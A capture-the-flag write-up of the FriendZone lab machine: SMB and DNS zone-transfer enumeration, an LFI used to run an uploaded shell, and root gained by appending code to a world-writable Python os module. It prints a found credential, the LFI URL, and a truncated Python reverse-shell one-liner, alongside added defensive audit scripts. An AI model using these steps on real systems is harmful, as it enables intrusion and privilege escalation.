Overview
This machine forces you to think about DNS servers and name lookups critically.
It starts off with the typical unsecured SMB shares where credentials are found, but then takes a twist requiring the user to enumerate subdomains and DNS records. After uncovering subdomains you are required to visit many sites over HTTP and HTTPS, eventually finding a login page that has a local file inclusion vulnerability. This means we can upload a file to the webserver and call it through the URL with a ? query, appending the statement. This calls our script and executes a backdoor.
A cron job is executing an important python script every 2 minutes, and the script imports the os module as part of its code. We are able to inject code into the os module because its permissions are not configured properly. From here we execute code for a backdoor.
Summary
Insecure SMB shares reveal password
Subdomain enumeration provides a new target
DNS enumeration provides a new subdomain of the subdomain.
This domain's dashboard page has an LFI vulnerability
A python script executing as root imports an os library with 777 permissions, so we can inject code and wait for root to execute it.
Tools/Blogs used
smbclient
dig
Lessons Learned
This machine was fairly pain free. I enjoyed the python library injection.
Enumeration
[★]$ nmap 10.10.10.123
Starting Nmap 7.80 ( https://nmap.org ) at 2020-11-30 13:32 UTC
Nmap scan report for 10.10.10.123
Host is up (0.21s latency).
Not shown: 992 closed ports
PORT STATE SERVICE
21/tcp open ftp
22/tcp open ssh
53/tcp open domain
80/tcp open http
139/tcp open netbios-ssn
443/tcp open https
445/tcp open microsoft-ds
2920/tcp filtered roboeda
Nmap done: 1 IP address (1 host up) scanned in 23.08 seconds
Enumeration detailed
Standard nmap scan but with the addition of -sC and -sV to use default scripts and check versions.
nmap -sC -sV 10.10.10.123
Starting Nmap 7.80 ( https://nmap.org ) at 2020-11-30 13:26 UTC
Nmap scan report for 10.10.10.123
Host is up (0.21s latency).
Not shown: 993 closed ports
PORT STATE SERVICE VERSION
21/tcp open ftp vsftpd 3.0.3
22/tcp open ssh OpenSSH 7.6p1 Ubuntu 4 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
| 2048 a9:68:24:bc:97:1f:1e:54:a5:80:45:e7:4c:d9:aa:a0 (RSA)
| 256 e5:44:01:46:ee:7a:bb:7c:e9:1a:cb:14:99:9e:2b:8e (ECDSA)
|_ 256 00:4e:1a:4f:33:e8:a0:de:86:a6:e4:2a:5f:84:61:2b (ED25519)
53/tcp open domain ISC BIND 9.11.3-1ubuntu1.2 (Ubuntu Linux)
| dns-nsid:
|_ bind.version: 9.11.3-1ubuntu1.2-Ubuntu
80/tcp open http Apache httpd 2.4.29 ((Ubuntu))
|_http-server-header: Apache/2.4.29 (Ubuntu)
|_http-title: Friend Zone Escape software
139/tcp open netbios-ssn Samba smbd 3.X - 4.X (workgroup: WORKGROUP)
443/tcp open ssl/http Apache httpd 2.4.29
|_http-server-header: Apache/2.4.29 (Ubuntu)
|_http-title: 404 Not Found
| ssl-cert: Subject: commonName=friendzone.red/organizationName=CODERED/stateOrProvinceName=CODERED/countryName=JO
| Not valid before: 2018-10-05T21:02:30
|_Not valid after: 2018-11-04T21:02:30
|_ssl-date: TLS randomness does not represent time
| tls-alpn:
|_ http/1.1
445/tcp open netbios-ssn Samba smbd 4.7.6-Ubuntu (workgroup: WORKGROUP)
Service Info: Hosts: FRIENDZONE, 127.0.0.1; OSs: Unix, Linux; CPE: cpe:/o:linux:linux_kernel
Host script results:
|_clock-skew: mean: -39m40s, deviation: 1h09m16s, median: 19s
|_nbstat: NetBIOS name: FRIENDZONE, NetBIOS user: <unknown>, NetBIOS MAC: <unknown> (unknown)
| smb-os-discovery:
| OS: Windows 6.1 (Samba 4.7.6-Ubuntu)
| Computer name: friendzone
| NetBIOS computer name: FRIENDZONE\x00
| Domain name: \x00
| FQDN: friendzone
|_ System time: 2020-11-30T15:26:58+02:00
| smb-security-mode:
| account_used: guest
| authentication_level: user
| challenge_response: supported
|_ message_signing: disabled (dangerous, but default)
| smb2-security-mode:
| 2.02:
|_ Message signing enabled but not required
| smb2-time:
| date: 2020-11-30T13:26:59
|_ start_date: N/A
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 43.54 seconds
SMB Enumeration - Port 445 / 139
smbclient -L 10.10.10.123
Enter WORKGROUP\htb-bluedolphin's password:
Sharename Type Comment
--------- ---- -------
print$ Disk Printer Drivers
Files Disk FriendZone Samba Server Files /etc/Files
general Disk FriendZone Samba Server Files
Development Disk FriendZone Samba Server Files
IPC$ IPC IPC Service (FriendZone server (Samba, Ubuntu))
SMB1 disabled -- no workgroup available
Well, I tried smbmap to quickly check the permissions but it has not been working, so I will have to dive in and check each file share individually. But before doing this I performed a little research to help automate my ongoing process and found that the nmap scripting engine has an SMB enumeration NSE script that can be called successfully.
nmap --script smb-enum-shares.nse 10.10.10.123
Starting Nmap 7.80 ( https://nmap.org ) at 2020-11-30 13:44 UTC
Nmap scan report for 10.10.10.123
Host is up (0.21s latency).
Not shown: 993 closed ports
PORT STATE SERVICE
21/tcp open ftp
22/tcp open ssh
53/tcp open domain
80/tcp open http
139/tcp open netbios-ssn
443/tcp open https
445/tcp open microsoft-ds
Host script results:
| smb-enum-shares:
| account_used: guest
| \\10.10.10.123\Development:
| Type: STYPE_DISKTREE
| Comment: FriendZone Samba Server Files
| Users: 0
| Max Users: <unlimited>
| Path: C:\etc\Development
| Anonymous access: READ/WRITE
| Current user access: READ/WRITE
| \\10.10.10.123\Files:
| Type: STYPE_DISKTREE
| Comment: FriendZone Samba Server Files /etc/Files
| Users: 0
| Max Users: <unlimited>
| Path: C:\etc\hole
| Anonymous access: <none>
| Current user access: <none>
| \\10.10.10.123\IPC$:
| Type: STYPE_IPC_HIDDEN
| Comment: IPC Service (FriendZone server (Samba, Ubuntu))
| Users: 1
| Max Users: <unlimited>
| Path: C:\tmp
| Anonymous access: READ/WRITE
| Current user access: READ/WRITE
| \\10.10.10.123\general:
| Type: STYPE_DISKTREE
| Comment: FriendZone Samba Server Files
| Users: 0
| Max Users: <unlimited>
| Path: C:\etc\general
| Anonymous access: READ/WRITE
| Current user access: READ/WRITE
| \\10.10.10.123\print$:
| Type: STYPE_DISKTREE
| Comment: Printer Drivers
| Users: 0
| Max Users: <unlimited>
| Path: C:\var\lib\samba\printers
| Anonymous access: <none>
|_ Current user access: <none>
Nmap done: 1 IP address (1 host up) scanned in 70.00 seconds
We can see that the Development and general shares are open for business (anonymous READ/WRITE). The Development share had nothing of use, but the general share had plain text credentials.
General Share
smbclient //10.10.10.123/general
Enter WORKGROUP\htb-bluedolphin's password:
Try "help" to get a list of possible commands.
smb: \> ls
. D 0 Wed Jan 16 20:10:51 2019
.. D 0 Wed Jan 23 21:51:02 2019
creds.txt N 57 Tue Oct 9 23:52:42 2018
9221460 blocks of size 1024. 6460344 blocks available
smb: \> get creds.txt
getting file \creds.txt of size 57 as creds.txt (0.1 KiloBytes/sec) (average 0.1 KiloBytes/sec)
smb: \>
cat creds.txt
creds for the admin THING:
admin:WORKWORKHhallelujah@#
HTTP Enumeration - Port 80
This smells like subdomain enumeration.
Browsing to friendzoneportal.red redirects us to the /?z directory. Firing up Burp Suite to intercept the request just redirects us to the main page again.
Testing the HTTPS page provides us with a different landing page.
A zone transfer request using dig showed us a couple of subdomains.
dig axfr friendzoneportal.red @10.10.10.123
; <<>> DiG 9.16.2-Debian <<>> axfr friendzoneportal.red @10.10.10.123
;; global options: +cmd
friendzoneportal.red. 604800 IN SOA localhost. root.localhost. 2 604800 86400 2419200 604800
friendzoneportal.red. 604800 IN AAAA ::1
friendzoneportal.red. 604800 IN NS localhost.
friendzoneportal.red. 604800 IN A 127.0.0.1
admin.friendzoneportal.red. 604800 IN A 127.0.0.1
files.friendzoneportal.red. 604800 IN A 127.0.0.1
imports.friendzoneportal.red. 604800 IN A 127.0.0.1
vpn.friendzoneportal.red. 604800 IN A 127.0.0.1
friendzoneportal.red. 604800 IN SOA localhost. root.localhost. 2 604800 86400 2419200 604800
;; Query time: 212 msec
;; SERVER: 10.10.10.123#53(10.10.10.123)
;; WHEN: Mon Nov 30 15:42:41 UTC 2020
;; XFR size: 9 records (messages 1, bytes 309)
The above subdomains are to be added to the /etc/hosts list and mapped to the server's IP address. This allows our device to resolve those names to the correct IP rather than the 127.0.0.1 the zone advertises.
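The step above can be scripted: parse the `dig axfr` answer, confirm it is a complete transfer (a zone that any client can pull is an allow-transfer misconfiguration on the BIND side), and emit the /etc/hosts lines pointing each name at the scanned host. This is an added example, not code from the original writeup; the sample input is constructed from the friendzoneportal.red records shown above and the target IP is the one scanned in this writeup.

```python
"""Parse dig axfr output and turn its A records into /etc/hosts lines.
Added example; SAMPLE_AXFR is constructed from the zone records the
writeup shows for friendzoneportal.red."""
import re

SAMPLE_AXFR = """\
; <<>> DiG 9.16.2-Debian <<>> axfr friendzoneportal.red @10.10.10.123
;; global options: +cmd
friendzoneportal.red.         604800 IN SOA  localhost. root.localhost. 2 604800 86400 2419200 604800
friendzoneportal.red.         604800 IN AAAA ::1
friendzoneportal.red.         604800 IN NS   localhost.
friendzoneportal.red.         604800 IN A    127.0.0.1
admin.friendzoneportal.red.   604800 IN A    127.0.0.1
files.friendzoneportal.red.   604800 IN A    127.0.0.1
imports.friendzoneportal.red. 604800 IN A    127.0.0.1
vpn.friendzoneportal.red.     604800 IN A    127.0.0.1
friendzoneportal.red.         604800 IN SOA  localhost. root.localhost. 2 604800 86400 2419200 604800
;; XFR size: 9 records (messages 1, bytes 309)
"""

# owner  ttl  IN  type  rdata
RR_LINE = re.compile(r"^(\S+)\s+(\d+)\s+IN\s+(\S+)\s+(.*)$")

def parse_axfr(text):
    """Return (owner, ttl, rtype, rdata) tuples; dig's ';' comment lines are skipped."""
    records = []
    for line in text.splitlines():
        line = line.strip()
        if not line or line.startswith(";"):
            continue
        m = RR_LINE.match(line)
        if m:
            owner, ttl, rtype, rdata = m.groups()
            records.append((owner.rstrip("."), int(ttl), rtype, rdata.strip()))
    return records

def transfer_succeeded(records):
    """A complete AXFR is bracketed by the same SOA record at start and end.
    Seeing this from an arbitrary client means the server's allow-transfer
    is too permissive; the fix is to restrict it to secondaries only."""
    soa = [r for r in records if r[2] == "SOA"]
    return len(soa) >= 2 and soa[0] == soa[-1]

def hosts_lines(records, target_ip):
    """Map every A-record owner to the scanned IP; the zone's 127.0.0.1 is useless from outside."""
    names = sorted({r[0] for r in records if r[2] == "A"})
    return ["%s %s" % (target_ip, n) for n in names]

if __name__ == "__main__":
    recs = parse_axfr(SAMPLE_AXFR)
    print("complete zone transfer:", transfer_succeeded(recs))
    print("\n".join(hosts_lines(recs, "10.10.10.123")))
```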
Logging in with those credentials we found in the smb general share we are brought to a page that simply suggests we look elsewhere.
Back to the drawing board
It was here that taking a step back was much needed. Another attempt at the subdomain enumeration turned over friendzone.red, so a DNS zone transfer with dig provided some juicy information.
└──╼ [★]$ dig axfr friendzone.red @10.10.10.123
; <<>> DiG 9.16.2-Debian <<>> axfr friendzone.red @10.10.10.123
;; global options: +cmd
friendzone.red. 604800 IN SOA localhost. root.localhost. 2 604800 86400 2419200 604800
friendzone.red. 604800 IN AAAA ::1
friendzone.red. 604800 IN NS localhost.
friendzone.red. 604800 IN A 127.0.0.1
administrator1.friendzone.red. 604800 IN A 127.0.0.1
hr.friendzone.red. 604800 IN A 127.0.0.1
uploads.friendzone.red. 604800 IN A 127.0.0.1
friendzone.red. 604800 IN SOA localhost. root.localhost. 2 604800 86400 2419200 604800
;; Query time: 212 msec
;; SERVER: 10.10.10.123#53(10.10.10.123)
;; WHEN: Sat Dec 05 18:29:32 UTC 2020
;; XFR size: 8 records (messages 1, bytes 289)
Adding administrator1.friendzone.red to /etc/hosts provided us access to the admin login page, but only after going over HTTPS. Initially HTTP was providing a broken page. This was a bit of a red herring.
This successfully brought us to the admin login page, where the credentials from the insecure SMB share have provided access.
The login page redirects us to dashboard.php
This took some time to figure out, but if we query the host for the suggested image parameter we get what we want, just like the webpage suggested: "please enter to show the image".
So we uploaded a shell through the SMB protocol to the Development share.
From there we called our reverse shell by appending the URL with an LFI to ../../../etc/Development. We called the shell with the previously defined syntax and received a backdoor.
https://administrator1.friendzone.red/dashboard.php?image_id=a.jpg&pagename=/etc/Development/shell
We get the flag from here, easy peasy :)
Privilege Escalation
After some initial enumeration I did not find much. Eventually I ran pspy and noticed a script being called every few minutes.
Investigating this script provided us with the following file contents.
#!/usr/bin/python
import os
to_address = "admin1@friendzone.com"
from_address = "admin2@friendzone.com"
print "[+] Trying to send email to %s"%to_address
#command = ''' mailsend -to admin2@friendzone.com -from admin1@friendzone.com -ssl -port 465 -auth -smtp smtp.gmail.co-sub scheduled results email +cc +bc -v -user you -pass "PAPAP"'''
#os.system(command)
# I need to edit the script later
# Sam ~ python developer
It was suggested that at this point we have to spend time enumerating and researching the script. Eventually I researched the python module 'os' and came across research regarding its exploitation.
I found some information but nothing overly helpful, but I learned the os.py file has open permissions.
friend@FriendZone:/opt/server_admin$ ls -la /usr/lib/python2.7/os.py
-rwxrwxrwx 1 root root 25910 Jan 15 2019 /usr/lib/python2.7/os.py
friend@FriendZone:/opt/server_admin$
So this means we can inject code into the library and then when the script is called, it will call the library with "import os" which will call and execute our script.
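The condition that makes this work is a standard-library file (or an import-path directory) that an unprivileged user can write to while a root cron job imports it. The audit below, an added example that is not part of the original writeup, walks a Python interpreter's import path and reports anything group- or other-writable; its `demo()` rebuilds the writeup's finding (an os.py with mode 777) in a temporary directory so the check can be exercised without a vulnerable host.

```python
"""Flag writable modules on a Python import path. Added example, not from
the writeup: the root cron job on this box does `import os` while
/usr/lib/python2.7/os.py is mode 777, so any local user can append code
that root then executes. This audit reports that condition."""
import os
import shutil
import stat
import sys
import tempfile

def is_unsafe_mode(mode):
    """True when group or others hold write permission (777, 666, 775, ...)."""
    return bool(mode & (stat.S_IWGRP | stat.S_IWOTH))

def writable_entries(paths):
    """Return (path, octal_mode) for each import-path directory, and each .py
    file or subdirectory directly inside it, that group or others may write.
    A writable directory matters as much as a writable module: a user can
    drop a file there that shadows a standard library name."""
    findings = []
    for base in paths:
        if not os.path.isdir(base):
            continue
        candidates = [base] + [os.path.join(base, n) for n in sorted(os.listdir(base))]
        for path in candidates:
            if path != base and not (path.endswith(".py") or os.path.isdir(path)):
                continue
            try:
                mode = os.stat(path).st_mode  # follow symlinks: the target's bits count
            except OSError:
                continue
            if is_unsafe_mode(mode):
                findings.append((path, oct(stat.S_IMODE(mode))))
    return findings

def demo():
    """Rebuild the writeup's finding in a temp dir: an os.py with mode 777."""
    tmp = tempfile.mkdtemp()  # created 0700, so the directory itself is not flagged
    try:
        fake = os.path.join(tmp, "os.py")
        open(fake, "w").close()
        os.chmod(fake, 0o777)
        return [(os.path.basename(p), m) for p, m in writable_entries([tmp])]
    finally:
        shutil.rmtree(tmp)

if __name__ == "__main__":
    print("demo:", demo())  # [('os.py', '0o777')]
    # Real findings for the interpreter running this file, if any.
    for path, mode in writable_entries([p for p in sys.path if p]):
        print("WRITABLE %s %s" % (mode, path))
```

Run it as the unprivileged user with the interpreter the cron job uses (here that would be python2, whose os.py lives under /usr/lib/python2.7), since each interpreter has its own sys.path.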
Initially I tried to inject code to cat the root flag into the temp folder and had no luck. I was not familiar enough with the syntax to troubleshoot the issue in a timely manner, so I decided to move into an area I was more syntactically familiar with.
I proceeded to attempt reverse shell injections and had some issues, but eventually settled on the python reverse shell with IPv4 syntax. I had to actually remove the python -c and the double quotes to get this to work. You can see the screenshot below:
This was pasted at the end of the os module.
import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s$